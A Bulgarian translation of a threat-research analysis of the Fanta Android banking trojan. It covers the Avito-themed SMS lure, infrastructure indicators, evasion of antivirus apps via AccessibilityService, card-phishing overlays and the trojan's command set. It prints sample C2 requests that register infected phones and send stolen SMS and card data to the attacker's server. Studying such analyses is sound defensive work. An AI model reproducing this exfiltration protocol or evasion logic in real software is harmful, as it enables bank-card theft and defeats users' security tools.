Лей се, Fanta: нова тактика на стария Android-троян

Лей се, Fanta: нова тактика на стария Android-троян

Веднъж ще искате да продадете нещо на Avito и, публикувайки подробен опис на вашия продукт (например, модул с оперативна памет), ще получите следното съобщение:

Лей се, Fanta: нова тактика на стария Android-троянКато отворите линка, ще видите на пръв поглед доста безобидна страница, която уведомява вас, щастливия и успешен продавач, за направена покупка:

Лей се, Fanta: нова тактика на стария Android-троян
След като натиснете бутона „Продължи“, на вашето Android устройство ще бъде изтеглен APK файл с икона и име, внушаващи доверие. Вие инсталирате приложението, което по някаква причина поиска разрешения за AccessibilityService, след което се появяват и бързо изчезват няколко прозореца и… всичко.

Вие влизате, за да проверите баланса си, но вашето банково приложение по някаква причина отново иска данните на вашата карта. След въвеждането на данните се случва нещо ужасно: по някаква все още непонятна за вас причина парите започват да изчезват от сметката ви. Опитвате се да разрешите проблема, но телефонът ви се съпротивлява: сам натиска бутоните „Назад“ и „Начало“, не се изключва и не позволява активирането на никакви средства за защита. В крайна сметка оставате без пари, вашият продукт не е продаден, вие сте в объркване и си задавате въпроса: какво се случи?

Отговорът е прост: станахте жертва на Android троян Fanta, от семейството Flexnet. Как успяхте да попаднете в тази ситуация? Сега ще обясним.

Автори: Андрей Половинкин, младши специалист по анализ на злонамерен код, Иван Писарев, специалист по анализ на злонамерен код.

Някои статистики

За първи път семейството Android трояни Flexnet стана известно още през 2015 година. През доста дългия период на активност семейството се разширява до няколко подвида: Fanta, Limebot, Lipton и т.н. Троянът, както и свързаната с него инфраструктура, не почиват: разработват се нови ефективни схеми за разпространение — в нашия случай качествени фишингови страници, насочени към конкретни потребители-продавачи, а разработчиците на трояните следват актуалните тенденции в вирусописането — добавят нови функционални възможности, които позволяват по-ефективно кражба на пари от заразени устройства и заобикалят механизми за защита.

Описваната в настоящата статия кампания е насочена към потребители от Русия, а малък брой заразени устройства са регистрирани в Украйна, още по-малко — в Казахстан и Беларус.

Въпреки че Flexnet присъства на арената на Android троянците вече повече от 4 години и е изчерпателно изследван от много изследователи, той все още е в добра форма. Започвайки от януари 2019 година, потенциалната сума на щетите надвишава 35 милиона рубли — и това е само по кампанията в Русия. През 2015 година различни версии на този Android троянец се продавали на андерграунд форуми, където можело да се намери и изходният код на троянеца с подробно описание. Това означава, че статистиката за щетите в света е дори по-внушителна. Неплохо за такъв старец, нали?

Лей се, Fanta: нова тактика на стария Android-троян

От продажба до измама

Както личи от предоставеното по-рано скриншото на фишинг страницата, предназначена за интернет услугата за обяви Avito, тя е подготвена за конкретна жертва. Съдейки по всичко, престъпниците използват един от парсерите на Avito, който извлича телефонния номер и името на продавача, както и описанието на продукта. След разгръщането на страницата и подготовката на APK файла, на жертвата се изпраща СМС съобщение с неговото име и линк към фишинг страницата, съдържаща описание на продукта и сумата, получена от „продажбата“ на продукта. Натискайки на бутона, потребителят получава злонамерен APK файл — Fanta.

Изследването на домейна shcet491[.]ru показа, че той е делегиран на DNS сървъри на компанията Hostinger:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

Файлът на зоната на домейна съдържа записи, указващи на IP адреси 31.220.23[.]236, 31.220.23[.]243 и 31.220.23[.]235. Въпреки това основният ресурсен запис на домейна (A-запис) указва на сървър с IP адрес 178.132.1[.]240.

IP адресът 178.132.1[.]240 се намира в Нидерландия и принадлежи на хостинга WorldStream. IP адресите 31.220.23[.]235, 31.220.23[.]236 и 31.220.23[.]243 се намират във Великобритания и принадлежат на виртуален хостинг сървър HOSTINGER. Като регистратор се използва openprov-ru. На IP адреса 178.132.1[.]240 също са резолвирани домейни:

  • sdelka-ru[.]ru
  • tovar-av[.]ru
  • av-tovar[.]ru
  • ru-sdelka[.]ru
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • viplata291[.]ru
  • perevod273[.]ru
  • perevod901[.]ru

Трябва да се отбележи, че от почти всички домейни бяха налични линкове от следния формат:

http://(www.){0,1}/[0-9]{7}

Този шаблон обхваща и линка от СМС съобщението. По исторически данни беше открито, че на един домейн съответстват няколко линка по горепосочения шаблон, което показва за използването на един домейн за разпространение на троянеца на множество жертви.

Нека се върнем малко напред: като управляващ сървър, зловреден софтуер, получен по линк от SMS, използва адрес onuseseddohap[.]club. Този домейн е регистриран на 2019-03-12, а взаимодействието на APK приложенията с него е започнало на 2019-04-29. Според данните, получени от VirusTotal, общо 109 приложения са взаимодействали с този сървър. Самият домейн е разрешен на IP адрес 217.23.14[.]27, разположен в Нидерландия и принадлежащ на хостинг компанията WorldStream. Като регистратор се използва namecheap. На този IP адрес също са разрешени домейни bad-racoon[.]club (от 2018-09-25) и bad-racoon[.]live (от 2018-10-25). С домейна bad-racoon[.]club са взаимодействали над 80 APK файла, с bad-racoon[.]live — над 100.

Като цяло, атаката протича по следния начин:

Лей се, Fanta: нова тактика на стария Android-троян

Какво има под капака на Fanta?

Както много други Android троянци, Fanta може да чете и изпраща SMS съобщения, да прави USSD запитвания и да показва свои собствени прозорци над приложения (включително банки). Въпреки това, в арсенала на този семейството от функционалности, се появи нова: Fanta започна да използва AccessibilityService с различни цели: за четене на съдържанието на уведомления от други приложения, предотвратяване на откритие и спиране на изпълнението на троянският софтуер на заразеното устройство и т.н. Fanta работи на всички версии на Android, не по-стари от 4.4. В тази статия ще разгледаме по-подробно следния семпл на Fanta:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Веднага след стартиране

Непосредствено след старта, троянският софтуер скрива иконата си. Работата на приложението е възможна само ако името на заразеното устройство не е в списъка:

  • android_x86
  • VirtualBox
  • Nexus 5X(bullhead)
  • Nexus 5(razor)

Тази проверка се извършва в основния сервис на троянския софтуер — MainService. При първото стартиране се инициализира конфигурационните параметри на приложението с подразбиращите се стойности (за формата на съхранение на конфигурационните данни и тяхното значение ще бъде разказано по-късно), както и регистрация на ново заразено устройство на управляващия сървър. На сървъра ще бъде изпратен HTTP POST запитване с тип на съобщението register_bot и информация за заразеното устройство (версия на Android, IMEI, телефонен номер, име на оператора и код на страната, в която е регистриран операторът). Като управляващ сървър служи адрес hXXp://onuseseddohap[.]club/controller.php. В отговор сървърът изпраща съобщение, което съдържа полета bot_id, bot_pwd, server — тези стойности приложението ги запазва като параметри на CnC-сървъра. Параметърът server е незадължителен, ако полето не е получено: Fanta използва адреса за регистрация — hXXp://onuseseddohap[.]club/controller.php. Функцията за промяна на CnC-адреса може да бъде приложена за решаване на две задачи: равномерно разпределение на натоварването между няколко сървъра (при голям брой заразени устройства натоварването на неоптимизирания уеб-сървър може да бъде високо), както и за използване на алтернативен сървър в случай на отказ на един от CnC-сървърите.

Ако по време на изпращането на заявката възникне грешка, троянът ще повтори процеса на регистрация след 20 секунди.

След успешна регистрация на устройството Fanta ще изведе на потребителя следното съобщение:

Лей се, Fanta: нова тактика на стария Android-троян
Важно забележка: услугата с наименование Сигурност на системата — наименованието на услугата на трояна, и след натискане на бутона ОК ще се отвори прозорец с настройките на Accessibility на заразеното устройство, където потребителят трябва сам да предостави права за Accessibility на злонамерената услуга:

Лей се, Fanta: нова тактика на стария Android-троян
Щом потребителят активира AccessibilityService, Fanta получава достъп до съдържанието на прозорците на приложенията и действията, извършвани в тях:

Лей се, Fanta: нова тактика на стария Android-троян
Веднага след получаването на правата за Accessibility троянът иска права на администратора и права за четене на известия:

Лей се, Fanta: нова тактика на стария Android-троян
Чрез AccessibilityService приложението имитира натискания на клавиши, като по този начин си предоставя всички необходими права.

Fanta създава няколко екземпляра на бази данни (които ще бъдат описани по-късно), необходими за запазване на конфигурационни данни, както и информация, събрана в процеса за заразеното устройство. За изпращане на събраната информация троянът създава повтаряща се задача, предназначена за извличане на полета от базата данни и получаване на команда от управляващия сървър. Интервалът за достъп до CnC се установява в зависимост от версията на Android: при 5.1 интервалът е 10 секунди, иначе 60 секунди.

За получаване на команда Fanta извършва заявка GetTask към управляващия сървър. В отговор CnC може да изпрати една от следните команди:

КомандаОписание
0Изпращане на SMS-съобщение
1Извършване на телефонно обаждане или USSD-команда
2Обновява параметъра интервал
3Обновява параметъра intercept
6Обновява параметъра smsManager
9Започнете събиране на SMS-съобщения
11Нулирайте телефона до заводските настройки
12Включване/Изключване на логването на създаване на диалогови прозорци

Fanta също така събира уведомления от 70 приложения на банки, системи за бързи плащания и електронни портфейли и ги запазва в база данни.

Съхранение на конфигурационни параметри

За съхранение на конфигурационни параметри Fanta използва стандартен подход за платформата Android — Preferences-файлове. Настройките ще бъдат запазени в файл с името settings. Описание на запазените параметри се намира в таблицата по-долу.

ИмеСтойност по подразбиранеВъзможни стойностиОписание
ид0IntegerИдентификатор на бота
serverhXXp://onuseseddohap[.]club/URLАдрес на управляващия сървър
pwdStringПарола за сървера
интервал20IntegerВремеви интервал. Показва за колко време трябва да се отложи изпълнението на следващите задачи:
  • При изпращане на запитване за статус на изпратено SMS съобщение
  • Получаване на нова команда от управляващия сървър

interceptвсичкиall/telNumberАко полето е равно на стринга всички или telNumber, то полученото SMS съобщение ще бъде прихванато от приложението и няма да бъде показано на потребителя
smsManager00/1Включване/изключване на приложението като получател на SMS по подразбиране
readDialogfalseTrue/falseВключване/изключване на логването на събития AccessibilityEvent

Също така Fanta използва файл smsManager:

ИмеСтойност по подразбиранеВъзможни стойностиОписание
pckgStringИме на използвания мениджър на SMS съобщения

Взаимодействие с бази данни

В процеса на работа, троянският кон използва две бази данни. Базата данни с име a се използва за съхранение на различна информация, събрана от телефона. Втората база данни носи името fanta.db и се използва за запазване на настройки, отговорни за създаването на фишинг прозорци, предназначени за събиране на информация за банкови карти.

Троянският кон използва базата данни а за съхранение на събираната информация и логване на своите действия. Данните се съхраняват в таблицата logs. За създаване на таблицата се използва следната SQL заявка:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

В базата данни се съдържа следната информация:

1. Логване на включването на заразеното устройство с сообщение Телефонът е включен!

2. Уведомления от приложения. Сообщението се формира по следния шаблон:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Данни за банкови карти от създадените от троянските фишингови формуляри. Параметърът VIEW_NAME може да бъде един от списъка:

  • AliExpress
  • Avito
  • Google Play
  • Разнообразно <%App Name%>

Сообщението се логва в формат:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер на картата:<RD_NUMBER%>; Дата:<%MONTH%>\/<%YEAR%>; CVV: <%CVV%>

4. Входящи/изходящи SMS съобщения в формат:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящо/Изходящо) <%Mobile number%>:<%SMS-text%>

5. Информация за пакета, създаваща диалогов прозорец в формат:

(<%Package name%>)<%Package information%>

Примерна таблица logs:

Лей се, Fanta: нова тактика на стария Android-троян
Една от функционалностите на Fanta е събиране на информация за банкови карти. Събирането на данни става чрез създаване на фишингови прозорци при отваряне на банкови приложения. Троянският кон създава фишингов прозорец само веднъж. Информацията за това, че прозорецът е бил показан на потребителя, се запазва в таблицата settings в базата данни fanta.db. За създаване на базата данни се използва следната SQL заявка:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Всички полета на таблицата settings по подразбиране се инициализират с стойност 1 (създаване на фишингов прозорец). След въвеждане на данните от потребителя, стойността ще бъде установена на 0. Пример на полета в таблицата settings:

  • can_login — полето отговаря за показване на формата при отваряне на банковото приложение
  • first_bank — не се използва
  • can_avito — полето отговаря за показване на формата при отваряне на приложението Avito
  • can_ali — полето отговаря за показване на формата при отваряне на приложението Aliexpress
  • can_another — полето отговаря за показване на формата при отваряне на всяко приложение от списъка: Юла, Pandao, Дром Авто, Кошелёк. Отстъпкови и бонусни карти, Aviasales, Booking, Trivago
  • can_card — полето отговаря за показване на формата при отваряне на Google Play

Взаимодействие с управляващия сървър

Мрежовото взаимодействие с управляващия сървър протича по протокол HTTP. За работа с мрежата Fanta използва популярната библиотека Retrofit. Заявките се изпращат на адрес hXXp://onuseseddohap[.]club/controller.php. Адресът на сървъра може да бъде променен при регистрация в сървъра. В отговор от сървъра могат да бъдат получени cookie. Fanta извършва следните заявки към сървъра:

  • Регистрацията на бота в управляващия сървър става един път при първото стартиране. На сървъра се изпращат следните данни за инфектираното устройство:
    · Cookie — получените cookie от сървъра (стойност по подразбиране — празен низ)
    · mode — низова константа register_bot
    · prefix — целочислена константа 2
    · version_sdk — формата се изгражда по следния шаблон: <%Build.MODEL%> / <%Build.VERSION.RELEASE%>(Avit)
    · imei — IMEI на инфектираното устройство
    · country — код на страната, в която е регистриран операторът, във формат ISO
    · number — телефонен номер
    · operator — име на оператора

    Пример на искане, изпратено до сървъра:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 144
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=register_bot&prefix=2&version_sdk=&imei=&country=&number=&operator=
    

    В отговор на искането, сървърът трябва да върне JSON обект, съдържащ следните параметри:
    · bot_id — идентификатор на заразеното устройство. В случай, че bot_id е равен на 0, Fanta ще повтори искането.
    · bot_pwd — паролата за сървъра.
    · server — адрес на управляващия сървър. Незадължителен параметър. В случай, че параметърът не е указан, ще бъде използван адресът, запазен в приложението.

    Пример на JSON обект:

    {
        "response":[
       	 {
       		 "bot_id": ,
       		 "bot_pwd": ,
       		 "server": 
       	 }
        ],
        "status":"ok"
    }

  • Искане за получаване на команда от сървъра. До сървъра се изпращат следните данни:
    · Cookie — получените cookies от сървъра
    · bid — id на заразеното устройство, което е получено при изпращане на искането register_bot
    · pwd — паролата за сървъра
    · divice_admin — полето определя дали са получени права на администратор. Ако правата на администратор са получени, полето е равно на 1, в противен случай 0
    · Accessibility — статус на работа на Accessibility Service. Ако услугата е стартирана, стойността е 1, в противен случай 0
    · SMSManager — показва дали троянът е настроен като приложение по подразбиране за получаване на SMS
    · screen — отбелязва в какво състояние е екранът. Ще бъде зададена стойност 1, ако екранът е включен, в противен случай 0;

    Пример на искане, изпратено до сървъра:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=getTask&bid=&pwd=&divice_admin=&Accessibility=&SMSManager=&screen=

    В зависимост от командата, сървърът може да върне JSON обект с различни параметри:

    · Команда Изпращане на SMS-съобщение: В параметрите се съдържа телефонен номер, текст на SMS съобщението и идентификатор на изпратеното съобщение. Идентификаторът се използва при изпращане на съобщение до сървъра с тип setSmsStatus.

    {
        "response":
        [
       	 {
       		 "mode": 0,
       		 "sms_number": ,
       		 "sms_text": ,
       		 "sms_id": %SMS_ID%
       	 }
        ],
        "status":"ok"
    }

    · Команда Извършване на телефонно обаждане или USSD-команда: Телефонният номер или командата идват в тялото на отговора.

    {
        "response":
        [
       	 {
       		 "mode": 1,
       		 "command": 
       	 }
        ],
        "status":"ok"
    }

    · Команда Промяна на параметъра interval.

    {
        "response":
        [
       	 {
       		 "mode": 2,
       		 "interval": 
       	 }
        ],
        "status":"ok"
    }

    · Команда Промяна на параметъра intercept.

    {
        "response":
        [
       	 {
       		 "mode": 3,
       		 "intercept": "all"/"telNumber"/
       	 }
        ],
        "status":"ok"
    }

    · Команда Променете полето SmsManager.

    {
        "response":
        [
       	 {
       		 "mode": 6,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

    · Команда Извършете събиране на SMS съобщения от заразеното устройство.

    {
        "response":
        [
       	 {
       		 "mode": 9
       	 }
        ],
        "status":"ok"
    }

    · Команда Нулирайте телефона до заводските настройки:

    {
        "response":
        [
       	 {
       		 "mode": 11
       	 }
        ],
        "status":"ok"
    }

    · Команда Променете параметъра ReadDialog.

    {
        "response":
        [
       	 {
       		 "mode": 12,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

  • Изпращане на съобщение от тип setSmsStatus. Тази заявка се извършва след изпълнението на командата Изпращане на SMS-съобщение. Заявката изглежда по следния начин:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=&status_sms=

  • Изпращане на съдържанието на базата данни. За една заявка се предава един ред. На сървера се изпращат следните данни:
    · Cookie — получените cookies от сървъра
    · mode — низова константа setSaveInboxSms
    · bid — id на заразеното устройство, което е получено при изпращане на искането register_bot
    · ntext — текст във текущия запис на БД (поле d от таблицата logs в базата данни а)
    · number — наименование на текущия запис на БД (поле p от таблицата logs в базата данни а)
    · sms_mode — целочислен статус (поле m от таблицата logs в базата данни а)

    Заявката изглежда по следния начин:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=setSaveInboxSms&bid=&text=&number=&sms_mode=

    При успешно изпращане на сървера, редът ще бъде премахнат от таблицата. Пример за JSON обект, връщан от сървера:

    {
        "response":[],
        "status":"ok"
    }

Взаимодействие с AccessibilityService

AccessibilityService е реализиран, за да улесни използването на Android устройства от хора с увреждания. В повечето случаи за взаимодействие с приложението е необходимо физическо взаимодействие. AccessibilityService позволява да се извърши програмно. Fanta използва услугата, за да създава фалшиви прозорци в банкови приложения и да пречи на отварянето на системните настройки и някои приложения.

Използвайки функционалността на AccessibilityService, троянът следи промените в елементите на екрана на заразеното устройство. Както вече беше описано, в настройките на Fanta има параметър, отговарящ за записването на операции с диалогови прозорци — readDialog. Ако този параметър е активиран, в базата данни ще се добави информация за името и описанието на пакета, който е иницирал събитие. Троянът извършва следните действия при задействането на събития:

  • Имитация на натискане на клавишите назад и начало в случай:
    · ако потребителят иска да рестартира устройството си
    · ако потребителят иска да изтрие приложението “Avito” или да промени правата за достъп
    · ако на страницата има споменаване на приложението “Avito”
    · при отваряне на приложението “Google Play Защита”
    · при отваряне на страници с настройки на AccessibilityService
    · при появата на диалогов прозорец “Сигурност на системата”
    · при отваряне на страницата с настройки “Draw over other app”
    · при отваряне на страниците “Приложения”, “Възстановяване и нулиране”, “Нулиране на данни”, “Нулиране на настройки”, “Панел на разработчика”, “Специални функции”, “Специални права”
    · ако събитието е било генерирано от определени приложения.

    Списък с приложения

    • андроид
    • Master Lite
    • Clean Master
    • Clean Master за x86 CPU
    • Meizu Управление на разрешенията на приложението
    • MIUI Сигурност
    • Clean Master — Антивирус & Очистка на кеша и боклука
    • Родителски контрол и GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock & Уеб Сигурност Beta
    • Virus Cleaner, Антивирус, Чистач (MAX Security)
    • Mobile AntiVirus Security PRO
    • Avast антивирус & безплатна защита 2019
    • Mobile Security МегаФон
    • AVG Защита за Xperia
    • Мобилна Сигурност
    • Malwarebytes антивирус & защита
    • Антивирус за Андроид 2019
    • Security Master — Антивирус, VPN, AppLock, Ускорител
    • AVG антивирус за таблет Huawei System Manager
    • Samsung Accessibility
    • Samsung Smart Manager
    • Security Master
    • Speed Booster
    • Dr.Web
    • Dr.Web Security Space
    • Dr.Web Mobile Control Center
    • Dr.Web Security Space Life
    • Dr.Web Mobile Control Center
    • Антивирус & Мобилна Сигурност
    • Kaspersky Internet Security: Антивирус и Защита
    • Kaspersky Battery Life: Спестител & Ускорител
    • Kaspersky Endpoint Security — защита и управление
    • AVG Антивирус безплатно 2019 – Защита за Андроид
    • Антивирус Андроид
    • Norton Mobile Security и Антивирус
    • Антивирус, защитна стена, VPN, мобилна сигурност
    • Mobile Security: антивирус, VPN, защита от кражба
    • Антивирус за Андроид

  • Ако при изпращане на SMS-съобщение на кратък номер се изисква разрешение, Fanta имитира натискане на чекбокс Запомни избора и бутона изпрати.
  • При опит за отнемане на правата на администратора от трояна, екранът на телефона се блокира.
  • Препятства добавянето на нови администратори.
  • В случай че антивирусното приложение dr.web е открило заплаха, Fanta имитира натискане на бутона игнорирай.
  • Троянът имитира натискане на бутона назад и началния екран, ако събитието е генерирано от приложението Samsung Device Care.
  • Fanta създава фишинг прозорци с формуляри за въвеждане на информация за банкови карти, ако е било стартирано приложение от списък, включващ около 30 различни интернет услуги. Сред тях: AliExpress, Booking, Avito, Компонент Google Play Market, Pandao, Дром Авто и др.

    Фишинг форми

    Fanta анализира кои приложения се стартират на заразеното устройство. Ако е било отворено интересно приложение, троянът демонстрира фишинг прозорец над всичките останали, който представлява формуляр за въвеждане на информация за банковата карта. Потребителят трябва да въведе следните данни:

    • Номер на картата
    • Срок на валидност на картата
    • CVV
    • Име на притежателя на картата (не за всички банки)

    В зависимост от стартираното приложение ще бъдат демонстрирани различни фишинг прозорци. По-долу ще бъдат представени примери на някои от тях:

    Aliexpress:

    Лей се, Fanta: нова тактика на стария Android-троян
    Avito:

    Лей се, Fanta: нова тактика на стария Android-троян
    За някои други приложения, например Google Play Market, Aviasales, Pandao, Booking, Trivago:
    Лей се, Fanta: нова тактика на стария Android-троян

    Как всичко беше наистина

    За щастие, човекът, получил описаното в началото на статията SMS съобщение, се оказа специалист в областта на киберсигурността. Затова реалната, не режисьорска версия се различава от разказаната по-рано: човекът получи интересно SMS, след което го предаде на екипа на Group-IB Threat Hunting Intelligence. Резултатът от атаката — тази статия. Щастлив край, нали? Въпреки това, далеч не всички истории завършват толкова успешно и, за да не бъде вашата подобна на режисьорската версия с изгубени пари, в повечето случаи е достатъчно да се придържате към следните, отдавна описани правила:

    • да не инсталирате приложения за мобилни устройства с ОС Android от никакви източници, освен Google Play
    • при инсталиране на приложение да обърнете особено внимание на правата, които искат приложението
    • да обръщате внимание на разширенията на изтеглените файлове
    • редовно да инсталирате актуализации на ОС Android
    • да не посещавате подозрителни ресурси и да не изтегляте файлове от там
    • да не кликвате на линкове, получени в SMS съобщения.

Източник: habr.com

Купете надежден хостинг за сайтове с защита от DDoS, VPS VDS сървъри 🔥 Купете надежден хостинг за сайтове с защита от DDoS, VPS VDS сървъри | ProHoster